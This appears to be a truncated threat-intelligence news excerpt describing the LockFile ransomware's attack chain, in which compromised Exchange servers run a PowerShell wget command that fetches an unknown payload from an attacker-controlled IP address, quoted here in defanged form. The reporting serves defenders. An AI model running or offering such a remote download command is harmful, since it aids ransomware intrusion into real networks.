Wednesday, October 27, 2021

LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers

Attack chain

Exchange servers are compromised through an as yet unidentified technique. On exploitation, the attacker executes a PowerShell command such as the following:

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

Other powershell wget commands to the same IP address use similar seemingly random high port numbers. It is unknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on victim networks for at least several days before …

Read More

Latest news
Related news